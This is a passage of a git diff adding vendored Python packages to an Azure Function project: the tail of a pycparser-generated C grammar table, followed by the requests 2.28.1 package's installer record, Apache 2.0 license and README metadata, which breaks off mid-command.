('struct_declaration -> SEMI','struct_declaration',1,'p_struct_declaration_2','c_parser.py',1059), + ('struct_declaration -> pppragma_directive','struct_declaration',1,'p_struct_declaration_3','c_parser.py',1064), + ('struct_declarator_list -> struct_declarator','struct_declarator_list',1,'p_struct_declarator_list','c_parser.py',1069), + ('struct_declarator_list -> struct_declarator_list COMMA struct_declarator','struct_declarator_list',3,'p_struct_declarator_list','c_parser.py',1070), + ('struct_declarator -> declarator','struct_declarator',1,'p_struct_declarator_1','c_parser.py',1078), + ('struct_declarator -> declarator COLON constant_expression','struct_declarator',3,'p_struct_declarator_2','c_parser.py',1083), + ('struct_declarator -> COLON constant_expression','struct_declarator',2,'p_struct_declarator_2','c_parser.py',1084), + ('enum_specifier -> ENUM ID','enum_specifier',2,'p_enum_specifier_1','c_parser.py',1092), + ('enum_specifier -> ENUM TYPEID','enum_specifier',2,'p_enum_specifier_1','c_parser.py',1093), + ('enum_specifier -> ENUM brace_open enumerator_list brace_close','enum_specifier',4,'p_enum_specifier_2','c_parser.py',1098), + ('enum_specifier -> ENUM ID brace_open enumerator_list brace_close','enum_specifier',5,'p_enum_specifier_3','c_parser.py',1103), + ('enum_specifier -> ENUM TYPEID brace_open enumerator_list brace_close','enum_specifier',5,'p_enum_specifier_3','c_parser.py',1104), + ('enumerator_list -> enumerator','enumerator_list',1,'p_enumerator_list','c_parser.py',1109), + ('enumerator_list -> enumerator_list COMMA','enumerator_list',2,'p_enumerator_list','c_parser.py',1110), + ('enumerator_list -> enumerator_list COMMA enumerator','enumerator_list',3,'p_enumerator_list','c_parser.py',1111), + ('alignment_specifier -> _ALIGNAS LPAREN type_name RPAREN','alignment_specifier',4,'p_alignment_specifier','c_parser.py',1122), + ('alignment_specifier -> _ALIGNAS LPAREN constant_expression RPAREN','alignment_specifier',4,'p_alignment_specifier','c_parser.py',1123), + ('enumerator -> ID','enumerator',1,'p_enumerator','c_parser.py',1128), + ('enumerator -> ID EQUALS constant_expression','enumerator',3,'p_enumerator','c_parser.py',1129), + ('declarator -> id_declarator','declarator',1,'p_declarator','c_parser.py',1144), + ('declarator -> typeid_declarator','declarator',1,'p_declarator','c_parser.py',1145), + ('pointer -> TIMES type_qualifier_list_opt','pointer',2,'p_pointer','c_parser.py',1257), + ('pointer -> TIMES type_qualifier_list_opt pointer','pointer',3,'p_pointer','c_parser.py',1258), + ('type_qualifier_list -> type_qualifier','type_qualifier_list',1,'p_type_qualifier_list','c_parser.py',1287), + ('type_qualifier_list -> type_qualifier_list type_qualifier','type_qualifier_list',2,'p_type_qualifier_list','c_parser.py',1288), + ('parameter_type_list -> parameter_list','parameter_type_list',1,'p_parameter_type_list','c_parser.py',1293), + ('parameter_type_list -> parameter_list COMMA ELLIPSIS','parameter_type_list',3,'p_parameter_type_list','c_parser.py',1294), + ('parameter_list -> parameter_declaration','parameter_list',1,'p_parameter_list','c_parser.py',1302), + ('parameter_list -> parameter_list COMMA parameter_declaration','parameter_list',3,'p_parameter_list','c_parser.py',1303), + ('parameter_declaration -> declaration_specifiers id_declarator','parameter_declaration',2,'p_parameter_declaration_1','c_parser.py',1322), + ('parameter_declaration -> declaration_specifiers typeid_noparen_declarator','parameter_declaration',2,'p_parameter_declaration_1','c_parser.py',1323), + ('parameter_declaration -> declaration_specifiers abstract_declarator_opt','parameter_declaration',2,'p_parameter_declaration_2','c_parser.py',1334), + ('identifier_list -> identifier','identifier_list',1,'p_identifier_list','c_parser.py',1366), + ('identifier_list -> identifier_list COMMA identifier','identifier_list',3,'p_identifier_list','c_parser.py',1367), + ('initializer -> assignment_expression','initializer',1,'p_initializer_1','c_parser.py',1376), + ('initializer -> brace_open initializer_list_opt brace_close','initializer',3,'p_initializer_2','c_parser.py',1381), + ('initializer -> brace_open initializer_list COMMA brace_close','initializer',4,'p_initializer_2','c_parser.py',1382), + ('initializer_list -> designation_opt initializer','initializer_list',2,'p_initializer_list','c_parser.py',1390), + ('initializer_list -> initializer_list COMMA designation_opt initializer','initializer_list',4,'p_initializer_list','c_parser.py',1391), + ('designation -> designator_list EQUALS','designation',2,'p_designation','c_parser.py',1402), + ('designator_list -> designator','designator_list',1,'p_designator_list','c_parser.py',1410), + ('designator_list -> designator_list designator','designator_list',2,'p_designator_list','c_parser.py',1411), + ('designator -> LBRACKET constant_expression RBRACKET','designator',3,'p_designator','c_parser.py',1416), + ('designator -> PERIOD identifier','designator',2,'p_designator','c_parser.py',1417), + ('type_name -> specifier_qualifier_list abstract_declarator_opt','type_name',2,'p_type_name','c_parser.py',1422), + ('abstract_declarator -> pointer','abstract_declarator',1,'p_abstract_declarator_1','c_parser.py',1434), + ('abstract_declarator -> pointer direct_abstract_declarator','abstract_declarator',2,'p_abstract_declarator_2','c_parser.py',1442), + ('abstract_declarator -> direct_abstract_declarator','abstract_declarator',1,'p_abstract_declarator_3','c_parser.py',1447), + ('direct_abstract_declarator -> LPAREN abstract_declarator RPAREN','direct_abstract_declarator',3,'p_direct_abstract_declarator_1','c_parser.py',1457), + ('direct_abstract_declarator -> direct_abstract_declarator LBRACKET assignment_expression_opt RBRACKET','direct_abstract_declarator',4,'p_direct_abstract_declarator_2','c_parser.py',1461), + ('direct_abstract_declarator -> LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET','direct_abstract_declarator',4,'p_direct_abstract_declarator_3','c_parser.py',1472), + ('direct_abstract_declarator -> direct_abstract_declarator LBRACKET TIMES RBRACKET','direct_abstract_declarator',4,'p_direct_abstract_declarator_4','c_parser.py',1482), + ('direct_abstract_declarator -> LBRACKET TIMES RBRACKET','direct_abstract_declarator',3,'p_direct_abstract_declarator_5','c_parser.py',1493), + ('direct_abstract_declarator -> direct_abstract_declarator LPAREN parameter_type_list_opt RPAREN','direct_abstract_declarator',4,'p_direct_abstract_declarator_6','c_parser.py',1502), + ('direct_abstract_declarator -> LPAREN parameter_type_list_opt RPAREN','direct_abstract_declarator',3,'p_direct_abstract_declarator_7','c_parser.py',1512), + ('block_item -> declaration','block_item',1,'p_block_item','c_parser.py',1523), + ('block_item -> statement','block_item',1,'p_block_item','c_parser.py',1524), + ('block_item_list -> block_item','block_item_list',1,'p_block_item_list','c_parser.py',1531), + ('block_item_list -> block_item_list block_item','block_item_list',2,'p_block_item_list','c_parser.py',1532), + ('compound_statement -> brace_open block_item_list_opt brace_close','compound_statement',3,'p_compound_statement_1','c_parser.py',1538), + ('labeled_statement -> ID COLON pragmacomp_or_statement','labeled_statement',3,'p_labeled_statement_1','c_parser.py',1544), + ('labeled_statement -> CASE constant_expression COLON pragmacomp_or_statement','labeled_statement',4,'p_labeled_statement_2','c_parser.py',1548), + ('labeled_statement -> DEFAULT COLON pragmacomp_or_statement','labeled_statement',3,'p_labeled_statement_3','c_parser.py',1552), + ('selection_statement -> IF LPAREN expression RPAREN pragmacomp_or_statement','selection_statement',5,'p_selection_statement_1','c_parser.py',1556), + ('selection_statement -> IF LPAREN expression RPAREN statement ELSE pragmacomp_or_statement','selection_statement',7,'p_selection_statement_2','c_parser.py',1560), + ('selection_statement -> SWITCH LPAREN expression RPAREN pragmacomp_or_statement','selection_statement',5,'p_selection_statement_3','c_parser.py',1564), + ('iteration_statement -> WHILE LPAREN expression RPAREN pragmacomp_or_statement','iteration_statement',5,'p_iteration_statement_1','c_parser.py',1569), + ('iteration_statement -> DO pragmacomp_or_statement WHILE LPAREN expression RPAREN SEMI','iteration_statement',7,'p_iteration_statement_2','c_parser.py',1573), + ('iteration_statement -> FOR LPAREN expression_opt SEMI expression_opt SEMI expression_opt RPAREN pragmacomp_or_statement','iteration_statement',9,'p_iteration_statement_3','c_parser.py',1577), + ('iteration_statement -> FOR LPAREN declaration expression_opt SEMI expression_opt RPAREN pragmacomp_or_statement','iteration_statement',8,'p_iteration_statement_4','c_parser.py',1581), + ('jump_statement -> GOTO ID SEMI','jump_statement',3,'p_jump_statement_1','c_parser.py',1586), + ('jump_statement -> BREAK SEMI','jump_statement',2,'p_jump_statement_2','c_parser.py',1590), + ('jump_statement -> CONTINUE SEMI','jump_statement',2,'p_jump_statement_3','c_parser.py',1594), + ('jump_statement -> RETURN expression SEMI','jump_statement',3,'p_jump_statement_4','c_parser.py',1598), + ('jump_statement -> RETURN SEMI','jump_statement',2,'p_jump_statement_4','c_parser.py',1599), + ('expression_statement -> expression_opt SEMI','expression_statement',2,'p_expression_statement','c_parser.py',1604), + ('expression -> assignment_expression','expression',1,'p_expression','c_parser.py',1611), + ('expression -> expression COMMA assignment_expression','expression',3,'p_expression','c_parser.py',1612), + ('assignment_expression -> LPAREN compound_statement RPAREN','assignment_expression',3,'p_parenthesized_compound_expression','c_parser.py',1624), + ('typedef_name -> TYPEID','typedef_name',1,'p_typedef_name','c_parser.py',1628), + ('assignment_expression -> conditional_expression','assignment_expression',1,'p_assignment_expression','c_parser.py',1632), + ('assignment_expression -> unary_expression assignment_operator assignment_expression','assignment_expression',3,'p_assignment_expression','c_parser.py',1633), + ('assignment_operator -> EQUALS','assignment_operator',1,'p_assignment_operator','c_parser.py',1646), + ('assignment_operator -> XOREQUAL','assignment_operator',1,'p_assignment_operator','c_parser.py',1647), + ('assignment_operator -> TIMESEQUAL','assignment_operator',1,'p_assignment_operator','c_parser.py',1648), + ('assignment_operator -> DIVEQUAL','assignment_operator',1,'p_assignment_operator','c_parser.py',1649), + ('assignment_operator -> MODEQUAL','assignment_operator',1,'p_assignment_operator','c_parser.py',1650), + ('assignment_operator -> PLUSEQUAL','assignment_operator',1,'p_assignment_operator','c_parser.py',1651), + ('assignment_operator -> MINUSEQUAL','assignment_operator',1,'p_assignment_operator','c_parser.py',1652), + ('assignment_operator -> LSHIFTEQUAL','assignment_operator',1,'p_assignment_operator','c_parser.py',1653), + ('assignment_operator -> RSHIFTEQUAL','assignment_operator',1,'p_assignment_operator','c_parser.py',1654), + ('assignment_operator -> ANDEQUAL','assignment_operator',1,'p_assignment_operator','c_parser.py',1655), + ('assignment_operator -> OREQUAL','assignment_operator',1,'p_assignment_operator','c_parser.py',1656), + ('constant_expression -> conditional_expression','constant_expression',1,'p_constant_expression','c_parser.py',1661), + ('conditional_expression -> binary_expression','conditional_expression',1,'p_conditional_expression','c_parser.py',1665), + ('conditional_expression -> binary_expression CONDOP expression COLON conditional_expression','conditional_expression',5,'p_conditional_expression','c_parser.py',1666), + ('binary_expression -> cast_expression','binary_expression',1,'p_binary_expression','c_parser.py',1674), + ('binary_expression -> binary_expression TIMES binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1675), + ('binary_expression -> binary_expression DIVIDE binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1676), + ('binary_expression -> binary_expression MOD binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1677), + ('binary_expression -> binary_expression PLUS binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1678), + ('binary_expression -> binary_expression MINUS binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1679), + ('binary_expression -> binary_expression RSHIFT binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1680), + ('binary_expression -> binary_expression LSHIFT binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1681), + ('binary_expression -> binary_expression LT binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1682), + ('binary_expression -> binary_expression LE binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1683), + ('binary_expression -> binary_expression GE binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1684), + ('binary_expression -> binary_expression GT binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1685), + ('binary_expression -> binary_expression EQ binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1686), + ('binary_expression -> binary_expression NE binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1687), + ('binary_expression -> binary_expression AND binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1688), + ('binary_expression -> binary_expression OR binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1689), + ('binary_expression -> binary_expression XOR binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1690), + ('binary_expression -> binary_expression LAND binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1691), + ('binary_expression -> binary_expression LOR binary_expression','binary_expression',3,'p_binary_expression','c_parser.py',1692), + ('cast_expression -> unary_expression','cast_expression',1,'p_cast_expression_1','c_parser.py',1700), + ('cast_expression -> LPAREN type_name RPAREN cast_expression','cast_expression',4,'p_cast_expression_2','c_parser.py',1704), + ('unary_expression -> postfix_expression','unary_expression',1,'p_unary_expression_1','c_parser.py',1708), + ('unary_expression -> PLUSPLUS unary_expression','unary_expression',2,'p_unary_expression_2','c_parser.py',1712), + ('unary_expression -> MINUSMINUS unary_expression','unary_expression',2,'p_unary_expression_2','c_parser.py',1713), + ('unary_expression -> unary_operator cast_expression','unary_expression',2,'p_unary_expression_2','c_parser.py',1714), + ('unary_expression -> SIZEOF unary_expression','unary_expression',2,'p_unary_expression_3','c_parser.py',1719), + ('unary_expression -> SIZEOF LPAREN type_name RPAREN','unary_expression',4,'p_unary_expression_3','c_parser.py',1720), + ('unary_expression -> _ALIGNOF LPAREN type_name RPAREN','unary_expression',4,'p_unary_expression_3','c_parser.py',1721), + ('unary_operator -> AND','unary_operator',1,'p_unary_operator','c_parser.py',1729), + ('unary_operator -> TIMES','unary_operator',1,'p_unary_operator','c_parser.py',1730), + ('unary_operator -> PLUS','unary_operator',1,'p_unary_operator','c_parser.py',1731), + ('unary_operator -> MINUS','unary_operator',1,'p_unary_operator','c_parser.py',1732), + ('unary_operator -> NOT','unary_operator',1,'p_unary_operator','c_parser.py',1733), + ('unary_operator -> LNOT','unary_operator',1,'p_unary_operator','c_parser.py',1734), + ('postfix_expression -> primary_expression','postfix_expression',1,'p_postfix_expression_1','c_parser.py',1739), + ('postfix_expression -> postfix_expression LBRACKET expression RBRACKET','postfix_expression',4,'p_postfix_expression_2','c_parser.py',1743), + ('postfix_expression -> postfix_expression LPAREN argument_expression_list RPAREN','postfix_expression',4,'p_postfix_expression_3','c_parser.py',1747), + ('postfix_expression -> postfix_expression LPAREN RPAREN','postfix_expression',3,'p_postfix_expression_3','c_parser.py',1748), + ('postfix_expression -> postfix_expression PERIOD ID','postfix_expression',3,'p_postfix_expression_4','c_parser.py',1753), + ('postfix_expression -> postfix_expression PERIOD TYPEID','postfix_expression',3,'p_postfix_expression_4','c_parser.py',1754), + ('postfix_expression -> postfix_expression ARROW ID','postfix_expression',3,'p_postfix_expression_4','c_parser.py',1755), + ('postfix_expression -> postfix_expression ARROW TYPEID','postfix_expression',3,'p_postfix_expression_4','c_parser.py',1756), + ('postfix_expression -> postfix_expression PLUSPLUS','postfix_expression',2,'p_postfix_expression_5','c_parser.py',1762), + ('postfix_expression -> postfix_expression MINUSMINUS','postfix_expression',2,'p_postfix_expression_5','c_parser.py',1763), + ('postfix_expression -> LPAREN type_name RPAREN brace_open initializer_list brace_close','postfix_expression',6,'p_postfix_expression_6','c_parser.py',1768), + ('postfix_expression -> LPAREN type_name RPAREN brace_open initializer_list COMMA brace_close','postfix_expression',7,'p_postfix_expression_6','c_parser.py',1769), + ('primary_expression -> identifier','primary_expression',1,'p_primary_expression_1','c_parser.py',1774), + ('primary_expression -> constant','primary_expression',1,'p_primary_expression_2','c_parser.py',1778), + ('primary_expression -> unified_string_literal','primary_expression',1,'p_primary_expression_3','c_parser.py',1782), + ('primary_expression -> unified_wstring_literal','primary_expression',1,'p_primary_expression_3','c_parser.py',1783), + ('primary_expression -> LPAREN expression RPAREN','primary_expression',3,'p_primary_expression_4','c_parser.py',1788), + ('primary_expression -> OFFSETOF LPAREN type_name COMMA offsetof_member_designator RPAREN','primary_expression',6,'p_primary_expression_5','c_parser.py',1792), + ('offsetof_member_designator -> identifier','offsetof_member_designator',1,'p_offsetof_member_designator','c_parser.py',1800), + ('offsetof_member_designator -> offsetof_member_designator PERIOD identifier','offsetof_member_designator',3,'p_offsetof_member_designator','c_parser.py',1801), + ('offsetof_member_designator -> offsetof_member_designator LBRACKET expression RBRACKET','offsetof_member_designator',4,'p_offsetof_member_designator','c_parser.py',1802), + ('argument_expression_list -> assignment_expression','argument_expression_list',1,'p_argument_expression_list','c_parser.py',1814), + ('argument_expression_list -> argument_expression_list COMMA assignment_expression','argument_expression_list',3,'p_argument_expression_list','c_parser.py',1815), + ('identifier -> ID','identifier',1,'p_identifier','c_parser.py',1824), + ('constant -> INT_CONST_DEC','constant',1,'p_constant_1','c_parser.py',1828), + ('constant -> INT_CONST_OCT','constant',1,'p_constant_1','c_parser.py',1829), + ('constant -> INT_CONST_HEX','constant',1,'p_constant_1','c_parser.py',1830), + ('constant -> INT_CONST_BIN','constant',1,'p_constant_1','c_parser.py',1831), + ('constant -> INT_CONST_CHAR','constant',1,'p_constant_1','c_parser.py',1832), + ('constant -> FLOAT_CONST','constant',1,'p_constant_2','c_parser.py',1851), + ('constant -> HEX_FLOAT_CONST','constant',1,'p_constant_2','c_parser.py',1852), + ('constant -> CHAR_CONST','constant',1,'p_constant_3','c_parser.py',1868), + ('constant -> WCHAR_CONST','constant',1,'p_constant_3','c_parser.py',1869), + ('constant -> U8CHAR_CONST','constant',1,'p_constant_3','c_parser.py',1870), + ('constant -> U16CHAR_CONST','constant',1,'p_constant_3','c_parser.py',1871), + ('constant -> U32CHAR_CONST','constant',1,'p_constant_3','c_parser.py',1872), + ('unified_string_literal -> STRING_LITERAL','unified_string_literal',1,'p_unified_string_literal','c_parser.py',1883), + ('unified_string_literal -> unified_string_literal STRING_LITERAL','unified_string_literal',2,'p_unified_string_literal','c_parser.py',1884), + ('unified_wstring_literal -> WSTRING_LITERAL','unified_wstring_literal',1,'p_unified_wstring_literal','c_parser.py',1894), + ('unified_wstring_literal -> U8STRING_LITERAL','unified_wstring_literal',1,'p_unified_wstring_literal','c_parser.py',1895), + ('unified_wstring_literal -> U16STRING_LITERAL','unified_wstring_literal',1,'p_unified_wstring_literal','c_parser.py',1896), + ('unified_wstring_literal -> U32STRING_LITERAL','unified_wstring_literal',1,'p_unified_wstring_literal','c_parser.py',1897), + ('unified_wstring_literal -> unified_wstring_literal WSTRING_LITERAL','unified_wstring_literal',2,'p_unified_wstring_literal','c_parser.py',1898), + ('unified_wstring_literal -> unified_wstring_literal U8STRING_LITERAL','unified_wstring_literal',2,'p_unified_wstring_literal','c_parser.py',1899), + ('unified_wstring_literal -> unified_wstring_literal U16STRING_LITERAL','unified_wstring_literal',2,'p_unified_wstring_literal','c_parser.py',1900), + ('unified_wstring_literal -> unified_wstring_literal U32STRING_LITERAL','unified_wstring_literal',2,'p_unified_wstring_literal','c_parser.py',1901), + ('brace_open -> LBRACE','brace_open',1,'p_brace_open','c_parser.py',1911), + ('brace_close -> RBRACE','brace_close',1,'p_brace_close','c_parser.py',1917), + ('empty -> ','empty',0,'p_empty','c_parser.py',1923), +] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/LICENSE new file mode 100644 index 0000000..b0fcd6d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/LICENSE @@ -0,0 +1,175 @@ + + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/METADATA new file mode 100644 index 0000000..3e37cbe --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/METADATA @@ -0,0 +1,122 @@ +Metadata-Version: 2.1 +Name: requests +Version: 2.28.1 +Summary: Python HTTP for Humans. +Home-page: https://requests.readthedocs.io +Author: Kenneth Reitz +Author-email: me@kennethreitz.org +License: Apache 2.0 +Project-URL: Documentation, https://requests.readthedocs.io +Project-URL: Source, https://github.com/psf/requests +Platform: UNKNOWN +Classifier: Development Status :: 5 - Production/Stable +Classifier: Environment :: Web Environment +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: Apache Software License +Classifier: Natural Language :: English +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3.11 +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: Implementation :: CPython +Classifier: Programming Language :: Python :: Implementation :: PyPy +Classifier: Topic :: Internet :: WWW/HTTP +Classifier: Topic :: Software Development :: Libraries +Requires-Python: >=3.7, <4 +Description-Content-Type: text/markdown +License-File: LICENSE +Requires-Dist: charset-normalizer (<3,>=2) +Requires-Dist: idna (<4,>=2.5) +Requires-Dist: urllib3 (<1.27,>=1.21.1) +Requires-Dist: certifi (>=2017.4.17) +Provides-Extra: security +Provides-Extra: socks +Requires-Dist: PySocks (!=1.5.7,>=1.5.6) ; extra == 'socks' +Provides-Extra: use_chardet_on_py3 +Requires-Dist: chardet (<6,>=3.0.2) ; extra == 'use_chardet_on_py3' + +# Requests + +**Requests** is a simple, yet elegant, HTTP library. + +```python +>>> import requests +>>> r = requests.get('https://httpbin.org/basic-auth/user/pass', auth=('user', 'pass')) +>>> r.status_code +200 +>>> r.headers['content-type'] +'application/json; charset=utf8' +>>> r.encoding +'utf-8' +>>> r.text +'{"authenticated": true, ...' +>>> r.json() +{'authenticated': True, ...} +``` + +Requests allows you to send HTTP/1.1 requests extremely easily. There’s no need to manually add query strings to your URLs, or to form-encode your `PUT` & `POST` data — but nowadays, just use the `json` method! + +Requests is one of the most downloaded Python packages today, pulling in around `30M downloads / week`— according to GitHub, Requests is currently [depended upon](https://github.com/psf/requests/network/dependents?package_id=UGFja2FnZS01NzA4OTExNg%3D%3D) by `1,000,000+` repositories. You may certainly put your trust in this code. + +[![Downloads](https://pepy.tech/badge/requests/month)](https://pepy.tech/project/requests) +[![Supported Versions](https://img.shields.io/pypi/pyversions/requests.svg)](https://pypi.org/project/requests) +[![Contributors](https://img.shields.io/github/contributors/psf/requests.svg)](https://github.com/psf/requests/graphs/contributors) + +## Installing Requests and Supported Versions + +Requests is available on PyPI: + +```console +$ python -m pip install requests +``` + +Requests officially supports Python 3.7+. + +## Supported Features & Best–Practices + +Requests is ready for the demands of building robust and reliable HTTP–speaking applications, for the needs of today. + +- Keep-Alive & Connection Pooling +- International Domains and URLs +- Sessions with Cookie Persistence +- Browser-style TLS/SSL Verification +- Basic & Digest Authentication +- Familiar `dict`–like Cookies +- Automatic Content Decompression and Decoding +- Multi-part File Uploads +- SOCKS Proxy Support +- Connection Timeouts +- Streaming Downloads +- Automatic honoring of `.netrc` +- Chunked HTTP Requests + +## API Reference and User Guide available on [Read the Docs](https://requests.readthedocs.io) + +[![Read the Docs](https://raw.githubusercontent.com/psf/requests/main/ext/ss.png)](https://requests.readthedocs.io) + +## Cloning the repository + +When cloning the Requests repository, you may need to add the `-c +fetch.fsck.badTimezone=ignore` flag to avoid an error about a bad commit (see +[this issue](https://github.com/psf/requests/issues/2690) for more background): + +```shell +git clone -c fetch.fsck.badTimezone=ignore https://github.com/psf/requests.git +``` + +You can also apply this setting to your global Git config: + +```shell +git config --global 